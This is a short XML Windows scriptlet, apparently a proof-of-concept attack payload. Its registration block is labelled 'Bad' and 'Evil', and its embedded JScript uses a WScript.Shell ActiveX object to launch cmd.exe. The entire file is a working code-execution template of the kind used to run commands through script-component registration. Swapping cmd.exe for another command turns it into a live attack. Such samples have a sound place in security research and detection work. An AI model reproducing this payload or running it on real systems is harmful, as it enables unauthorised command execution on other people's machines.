<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bad"
    progid="Evil"
    version="1.00"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}">


<script language="JScript">
<![CDATA[

var x = new ActiveXObject("WScript.Shell").Run("cmd.exe");

]]>
</script>
</registration>
</scriptlet>
